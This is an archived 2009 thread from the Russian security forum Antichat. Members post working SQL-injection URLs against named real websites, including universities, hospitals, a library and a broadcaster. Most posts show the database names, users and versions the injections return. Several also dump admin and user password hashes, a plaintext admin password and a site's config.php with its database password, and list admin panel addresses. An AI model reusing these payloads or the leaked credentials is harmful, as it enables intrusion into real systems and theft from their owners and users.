ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

05.05.2009, 16:00
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Код:
http://www.cir.org.br/noticias.php?id=592+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15,16,17,18,19,20,21,22
cir_admin@localhost:cir_db:4.1.20
|
|
|

05.05.2009, 16:08
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме: 2584134
Репутация:
519
|
|
Код:
http://www.fvhospital.com/fr/news/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),17--+
db info:
Код:
db14709@64.13.192.31 : db14709_fvh_stage : 4.1.25-Debian_mt1
|
|
|

05.05.2009, 16:49
|
|
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме: 2875309
Репутация:
348
|
|
www.rnb-music.ru
COncat'oM неполучается выводить
Код:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,user(),3,4,5,6,7--
user():altero_rnb@localhost
Код:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,version(),3,4,5,6,7--
version():5.0.22
Код:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,database(),3,4,5,6,7--
database():altero_rnb
Таблицы:
Код:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables--
Код:
» afisha (262)
» articles (76)
» artist (44)
» ban_ip (190)
» ban_name (186)
» banners (23)
» billboard (296)
» bios (19)
» booking (6)
» catalog (3)
» celebs_comments (10331)
» chart (12521)
» chart_name (3)
» chart_type (5)
» charts (24)
» city (13)
» clubs (52)
» comments (40953)
» contest (2)
» dance (8)
» demos (19)
» demos2 (3)
» dj (23)
» dj_comments (301)
» djmail (337)
» feedback (904)
» links (823)
» lyrics (8173)
» mixes (56)
» myalbums (8)
» myphotos (1059)
» myphotos_comments (3287)
» myphotos_stats (190415)
» myphotos_text (969)
» newphotos (3538)
» news (609)
» photo_comments (19213)
» photos (122)
» q_a (25)
» releases (439)
» reviews (32)
» ru_comments (7)
» ru_rnb (10)
» ru_tracks (34)
» showed (29444)
» showed_celebs (1123)
» showed_myphotos (4235)
» subscr (153)
» test (1)
» testing (0)
» tracks (195)
» u2u (1)
» users (6873)
» videos (78)
» week_chart (1018)
» xmb_attachments (428)
» xmb_banned (46)
» xmb_buddys (342)
» xmb_captchaimages (14049)
» xmb_favorites (2127)
» xmb_forums (26)
» xmb_logs (1929)
» xmb_members (10092)
» xmb_posts (410819)
» xmb_ranks (10)
» xmb_regimages (0)
» xmb_restricted (6)
» xmb_settings (1)
» xmb_smilies (74)
» xmb_templates (199)
» xmb_themes (1)
» xmb_threads (24808)
» xmb_u2u (36507)
» xmb_vote_desc (1650)
» xmb_vote_results (2538)
» xmb_vote_voters (6188)
» xmb_whosonline (33)
» xmb_words (4)
Юзвери(около 6,5к):
Логин:
Код:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,name,3,4,5,6,7+from+users--
Пасс:
Код:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,pass,3,4,5,6,7+from+users--
Админ:
Ник:Altero
Пасс:kexik408
Форум:
Ник:
Код:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,username,3,4,5,6,7+from+xmb_members--
Пасс:
Код:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,password,3,4,5,6,7+from+xmb_members--
Админка
Код:
www.rnb-music.ru/admin
Доступ по айпи(
PR:2
ТиЦ:240
config.php
Код:
<?php
if (!defined('IN_CODE')) {
exit("Not allowed to run this file directly.");
}
$dbname = 'altero_rnb'; // Name of your database
$dbuser = 'altero_rnb'; // Username used to access it
$dbpw = 'a12345'; // Password used to access it
$dbhost = 'localhost'; // Database host, usually 'localhost'
$database = 'mysql'; // Database type, currently only mysql is supported.
$pconnect = 0; // Persistent connection, 1 = on, 0 = off, use if 'too many connections'-errors appear
// Table Settings
$tablepre = 'xmb_'; // Table-pre
// Path-settings
// In full_path, put the full URL you see when you go to your boards, WITHOUT the filename though!!
// And please, don't forget the / at the end...
$full_url = 'http://rnb-music.ru/konfa/';
// Other settings
// There are situations where you don't want to see the <!-- template start: index -->...<!-- template end: index -->
// tags around each template. In those cases, change the following to false, or true to turn it back on.
// Default value: false;
$comment_output = true;
// Alternative mailer
// some hosts prevent the direct use of sendmail, which php uses to send out emails by default.
// To get around this, we have included code which will contact a separate SMTP server of your
// choice, and will send the mail trough that. The following mailer-options are available:
// 'default' => php's internal mail() function. No additional values need to be set:
// (does not require a username/password/host/port)
// 'socket_SMTP' => a connection to the SMTP server trough sockets. Requires the username,
// password, host and port values to be entered correctly to work.
$mailer['type'] = 'default';
// mailer-options (for socket_SMTP only, currently)
$mailer['username'] = 'MAILER_USER';
$mailer['password'] = 'MAILER_PASS';
$mailer['host'] = 'MAILER_HOST';
$mailer['port'] = 'MAILER_PORT';
// Plugin Settings
$i = 1;
// Plugins are the links in the navigation part of the Header. Plugins built-in by default include Search, FAQ, Member List, Today's Posts, Stats and Board Rules.
// To add extra plugins (links of your own), just edit the code between Start Plugin Code and End Plugin Code. If you with to add more than one, simply copy that block, paste it and add the second one.
// Start Plugin code
$plugname[$i] = ''; // This is the name of your plugin. eg. Avatar Gallery, TeddyBear, etc.
$plugurl[$i] = ''; // This is the location, link, or URL to the plugin
$plugadmin[$i] = false; // Is this plugin only for admins? Set to true if the plugin can only be seen/used by (super-)admins, false when it's can be used by anyone
$plugimg[$i] = ''; // This is the path (full URL) to the image to show in front of the text.
$i++;
// End plugin code.
// Start Plugin code for plugin #2
$plugname[$i] = ''; // This is the name of your plugin. eg. Avatar Gallery, TeddyBear, etc.
$plugurl[$i] = ''; // This is the location, link, or URL to the plugin
$plugadmin[$i] = false; // Is this plugin only for admins? Set to true if the plugin can only be seen/used by (super-)admins, false when it's can be used by anyone
$plugimg[$i] = ''; // This is the path (full URL) to the image to show in front of the text.
$i++;
// End plugin code for plugin #2
// To make multiple plugins, copy and paste this plugin-code, so you have multiple entries.
// Registration settings
/***************
* The ipcheck, checks if your IP is a valid IPv4 or IPv6 type, if none of these, it will kill.
* this might shut a few users out, so you can turn it off by changing the $ipcheck variable to 'off'
****************
* The allow_spec_q variable specifies if Special queries (eg. USE database and SHOW DATABASES) are allowed.
* By default, they are not, meaning $allow_spec_q = false;
* To allow them, change $allow_spec_q to true ($allow_spec_q = true;)
****************
* The show_full_info variable lets you decide wether to show the Build and Alpha/Beta/SP markings in the HTML or not.
* Change the value to true to show them, or false to turn them off.
* Default = true;
****************/
$ipcheck = 'off';
$allow_spec_q = true;
$show_full_info = false;
define('DEBUG', false);
// define('DEBUG', true);
?>
Последний раз редактировалось ..::TROYAN::..; 05.05.2009 в 16:59..
|
|
|

05.05.2009, 16:58
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме: 3217552
Репутация:
1668
|
|
[PR 4]
Код:
http://www.opaloman.org/data.php?id=-8+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8--
4.1.20:db_opaloman:opal_oman@localhost
[PR 2]
Код:
http://www.host-park.ru/data.php?id=-10+union+select+concat_ws(0x3a,version(),database(),user()),2,3--
5.0.45-community:db_hostpark1:hostpark1@localhost
[PR 1]
Код:
http://www.corecta.com/prestige/data.php?id=-2063+union+select+concat_ws(0x3a,version(),database(),user())
4.0.27-icd1-log:corectadb:prestige@localhost
[PR 0]
Код:
http://www.city-site.com.ua/data.php?m=1&cat=1&subcat=-1+union+select+concat_ws(0x3a,version(),database(),user()),2--
5.0.22:citysite_inf:citysite_red@localhost
|
|
|

05.05.2009, 17:54
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
PR: 6
http://ume.ensta.fr/biblio/show.php?id=-1'+union+%20select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,concat_ws(0x3a,version(),d at abase(),use r()),40,41,42,43,44,45/*
5.0.22-log:bibume:rootume@localhost
http://ume.ensta.fr/biblio/show.php?id=-1'+union+%20select+1,2,3,4,table_name,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,table_name,40,41, 42,43,44,45+from+information_schema.tables/*
bib_user
admin:50ea881c822098a867b5643eed614825
------------------------------------------------------------------------
PR: 5
http://www.lorin.fr/produits-categoriesenglish.php?ID=-1+union+select+1,2,concat_ws(0x3a,ver sion(),database(),u ser()),4,5,6--
4.0.25-standard-log:lorinlorin:lorinlorin@10.0.64.123
Последний раз редактировалось HAXTA4OK; 05.05.2009 в 18:16..
|
|
|

05.05.2009, 18:14
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме: 5290740
Репутация:
912
|
|
http://www.policlinicagipuzkoa.com/conferencia.php?idioma=eu&id=-3+union+select+1,2,3,4,5,6,7--
Database Version: 5.0.27-log
Database name: poligipzk
User name: poligipzk@albergue-unix.sarenet.es
http://www.ceskatelevize.cz/program/pokr/?idp=10213389625&page=strukturalni-fondy-eu&id=-3+union+select+1,2,3,4,5,6--
Database Version: 5.0.77-log
Database name: podnikatelsky_servises
User name: podniservi@10.1.0.14
http://www.bsl-med.ru/?todo=news&id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Database Version: 5.0.67-log
Database name: u179055
User name: u179055@10.10.153.189
root:32f82a1f2e69453c3356be43ef06d8cc
Админка:
http://bsl-med.ru/admin/
Последний раз редактировалось .:[melkiy]:.; 05.05.2009 в 18:36..
|
|
|

05.05.2009, 19:02
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
http://aramis.obspm.fr/HORIZON/php/abstracts.php?id=-1+union+select+1,concat_ws(0x3a,vers ion(),datab ase(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23--
4.0.16-standard:horizon:combes@localhost
|
|
|

05.05.2009, 19:05
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме: 1759582
Репутация:
394
|
|
http://www.che.gatech.edu {PR 5}
Код:
http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96--
Код:
http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96--
5.0.77:dynabot2:dbread@dot.chbe.gatech.edu
Код:
http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96+from+information_schema.tables--
|
|
|

05.05.2009, 19:36
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме: 2584134
Репутация:
519
|
|
ТИЦ - 40
PR - 4
Код:
http://www.geostroy.ru/news.php?id=-66+UNION%20SELECT%201,2,concat_ws(0x3a,user,password,file_priv)%20,4,5,6,7,8+from+mysql.user--+
User info:
Код:
root:141091821ee9bcaa:Y
Код:
http://www.geostroy.ru/news.php?id=-66+UNION%20SELECT%201,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8+from+mysql.user--+
db info:
Код:
volex@1-srv.geostroi.ru : geostroy : 4.0.12-max-nt
Admin panel:
Код:
www.geostroy.ru/admin
|
|
|

05.05.2009, 19:59
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме: 1759582
Репутация:
394
|
|
Код:
http://www2.santacruzpl.org/cid/public/full.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
5.0.32-Debian_7etch1-log:cid:infocruz@scplweb.santacruzpl.org
Код:
http://www2.santacruzpl.org/cid/public/full.php?id=-1+union+select+group_concat(username,0x3a,password)+from+users/*
Ann:2eb586417e7befa2
morrisr:42687b1e579d2f2c
deckerg:45ab966f48704ded
czarneckij:0560dafa54fc2cd5
jessb:40fbb0380a8eb49c
stephensd:0e0cc804789ea146
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|